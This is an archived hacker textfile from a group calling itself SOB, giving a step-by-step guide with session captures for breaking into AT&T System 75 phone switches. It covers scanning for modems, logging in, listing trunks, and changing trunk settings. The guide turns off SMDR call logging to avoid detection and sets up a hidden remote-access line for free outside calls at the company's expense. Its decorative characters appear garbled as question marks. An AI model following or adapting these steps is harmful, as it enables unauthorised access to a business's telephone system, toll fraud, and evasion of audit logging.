💾 Archived View for spam.works › mirrors › textfiles › phreak › sobsys75.txt captured on 2023-06-16 at 19:49:39.
-=-=-=-=-=-=-
???????????????????????????????????????????????????????????????????????????????
????????? ???? ???? ???? ??
???????? T?H?E ?????? ?????? G?U?I?D?E T?O S?Y?S?T?E?M 7?5?'?S ???
??????? ???? ???? ???? ????
?????? ?????
????? A production by: Equinox [SOB] ??????
???? ???????
??? Special thanks to: Dave [SOB] ????????
?? Syncomm [SOB] ?????????
???????????????????????????????????????????????????????????????????????????????
DISCLAIMER:
???????????
This file is for informational purposes only. To use any of the techniques
within this file without permission is strictly prohibited. Equinox and The
Servants of Babuska will not be held responsible for any damages resulting from
the use or misuse of this information.
??[ WARNING ]??????????????????????????????????????????????????????????????????
? System 75's are a very dangerous thing to mess with, if you don't have a ?
? means of diverting your call, I would suggest not messing with them. These ?
? systems have been known to have SMDR (a force worse than the dreaded ANI) ?
? on every line. ?
???????????????????????????????????????????????????????????????????????????????
...In other words, don't try this at home...
INTRODUCTION:
?????????????
Perhaps one of the greatest systems created by AT&T is the System 75. With
access to one of these, a user will have virtually unlimited control of a
companie's phone systems. These can be used to create PBX's, bridges, and
loops. This is a step, by step guide to creating your own PBX. In order to
make this easier to understnad, we have included a capture from an actual
System 75 as we created a PBX on it. Without further delay, we will now
procede.
STEP 1. FINDING A SYSTEM 75:
????????????????????????????
System 75's are usually found in large companies, so you would be best off
scanning downtown areas, but they have been found everywhere. After you
have gotten a list of carriers, now you have to indentify a System 75.
STEP 2. IDENTIFYING A SYSTEM 75:
????????????????????????????????
First of all the first tell-tell sign of a System 75 is the 1200 baud
connection. To connect with a System 75, you will want to set yourself for
1200 7-E-1. You will also want to use VT100 emulation. I will now include
a capture from a System 75:
???????????????????????????????????????????????????????????????????????????????
ATDT *******
CONNECT 1200
KEYBOARD LOCKED, WAIT FOR LOGIN
(screen clears)
Login: **** [Note: The account names and passwords have]
Password: ****** [not been included for obvious reason.]
INCORRECT LOGIN
Login: *****
Password: *******
Terminal Type (513, 4410, 4425): [513] [Bell 513 emulation is basically]
[VT100]
???????????????????????????????????????????????????????????????????????????????
STEP 3. THE INITIAL SURVEY:
???????????????????????????
I suggest making two calls to the System, first to make a survey and capture
all of the information in the system. Your first just trying to get
information on all of the lines running into the system to find a suitable host
for the PBX. In making it easier to understand, all of the things you need to
type are in the { }.
Once your in, you will see this screen:
???????????????????????????????????????????????????????????????????????????????
<SB
Copyright (c) 1986 - AT&T
Unpublished & Not for Publication
All Rights Reserved
???????????????????????????????????????????????????????????????????????????????
Okay, it is now prompting you for your input, so you will want to try this
first:
enter command: {list trunk-group}
???????????????????????????????????????????????????????????????????????????????
list trunk-group
Page 1
TRUNK GROUPS
Grp No. Out Queue
No. TAC Group Type Group Name Mem COR SMDR? Meas Disp? Length
18 800co OUTSIDE CALL 14 18ynonen0
19 801did OUT SIDE CALLS 8 19ynonen0
Command successfully completed
<
???????????????????????????????????????????????????????????????????????????????
Ok a few thing to explain, the first number on the left is the trunk number,
be sure to make a note of it. The group name will tell you what it is used
for, the number after that is the number of lines connected to that trunk.
About the only other thing of interest is SMDR, it can be bad, so you want
to turn it off. Now that you have seen that trunks 18 and 19 are in use, you
want to do this:
???????????????????????????????????????????????????????????????????????????????
enter command: {dis trunk 18}
<
display trunk-group 18 Page 1 of 9
TRUNK GROUP
Group Number: 18 Group Type: co SMDR Reports? y
Group Name: OUTSIDE CALL COR: 18 TAC: 800
Direction: two-way Outgoing Display? n
Dial Access? y Busy Threshold: 99 Night Service: 0
Queue Length: 0 Incoming Destination: 0
Comm Type: voice Auth Code? n Digit Absorption List:
Prefix-1? n Restriction: code
Trunk Flash? n
TRUNK PARAMETERS
Trunk Type: ground-start
Outgoing Dial Type: tone
Trunk Termination: rc Disconnect Timing(msec): 500
Terminal Balanced? n RA Trunk Loss: 0db
Answer Supervision Timeout: 10 Receive Answer Supervision? n
???????????????????????????????????????????????????????????????????????????????
Ok, this is telling you all you ever wanted to know about trunk 18. To go to
the next page, you will have to type one of the control codes which are
case-sensitive, so you want to type:
{ Esc [ U }
???????????????????????????????????????????????????????????????????????????????
display trunk-group 18 Page 2 of 9
TRUNK FEATURES
ACA Assignment? n
Measured: none Abandoned Call Search? n
Data Restriction? n
Maintenance Tests? y
Suppress # Outpulsing? n
{ Esc [ U }
???????????????????????????????????????????????????????????????????????????????
display trunk-group 18 Page 3 of 9
TRUNK GROUP
GROUP MEMBER ASSIGNMENTS
Port Name Night Mode Type Ans Delay
1: 1A0601 *******
2: 1A0602 ****
3: 1A0603 ****
4: 1A0604 ****
5: 1A0605 ****
6: 1A0606 ****
7: 1A0607 ****
8: 1A0608 ****
9: 1A0901 ****
10: 1A0902 ****
11: 1A0903 ****
12: 1A0904 ****
13: 1A0905 ****
14: 1A0906 ****
15:
???????????????????????????????????????????????????????????????????????????????
Okay, this is one of the most important parts you need to get, the phone
numbers. The phone numbers portion which I have censored out are the numbers
you would have to call to get into the system. Ok, after seeing that this page
isn't full, you don't need to go to the next screen. So, you need to sent the
cancel command code:
???????????????????????????????????????????????????????????????????????????????
{ Esc O w }
Command aborted
enter command:
???????????????????????????????????????????????????????????????????????????????
Ok, you want to continue the process until you have captured all the
information from each trunk. So you will want to continue on to the next
trunk.
???????????????????????????????????????????????????????????????????????????????
enter command: logoff
NO CARRIER
???????????????????????????????????????????????????????????????????????????????
You will now want to go through the list of trunks and find one that isn't
important. You need one that will have little chance of other people
discovering the PBX you put up. You may find it easiest to set it up as
a night access PBX. We will now call the system back and set it up.
???????????????????????????????????????????????????????????????????????????????
CONNECT 38400
Login: *****
Password:
Terminal Type (513, 4410, 4425): [513]
<SB
Copyright (c) 1986 - AT&T
Unpublished & Not for Publication
All Rights Reserved
enter command: ch rem
<
change remote-access Page 1 of 1
REMOTE ACCESS
Remote Access Extension: {599}
Barrier Code Length: {6}
Authorization Code Required? n
BARRIER CODE ASSIGNMENTS (Enter up to 10)
Barrier Code COR COS Barrier Code COR COS
1: {******} 1 1 6: 1 1
2: 1 1 7: 1 1
3: 1 1 8: 1 1
4: 1 1 9: 1 1
5: 1 1 10: 1 1
{ Esc S B }
Command successfully completed
<
enter command: ch trunk 18
<
change trunk-group 18 Page 1 of 9
TRUNK GROUP
Group Number: 18 Group Type: co SMDR Reports? {n}
Group Name: OUTSIDE CALL COR: 18 TAC: 800
Direction: two-way Outgoing Display? n
Dial Access? y Busy Threshold: 99 Night Service: {599}
Queue Length: 0 Incoming Destination: 0
Comm Type: voice Auth Code? n Digit Absorption List:
Prefix-1? n Restriction: code
Trunk Flash? n
TRUNK PARAMETERS
Trunk Type: ground-start
Outgoing Dial Type: tone
Trunk Termination: rc Disconnect Timing(msec): 500
Terminal Balanced? n RA Trunk Loss: 0db
Answer Supervision Timeout: 10 Receive Answer Supervision? n
{ Esc S B }
Command successfully completed
<
enter command: logoff
NO CARRIER
???????????????????????????????????????????????????????????????????????????????
Now just wait until night and call the number. You should get a dial tone,
dial your code and then 9-1-npa-pre-suff. The 9 may not be required or may be
a different number.
That should be about all you need to set up the PBX.
Have fun...
Equinox [SOB]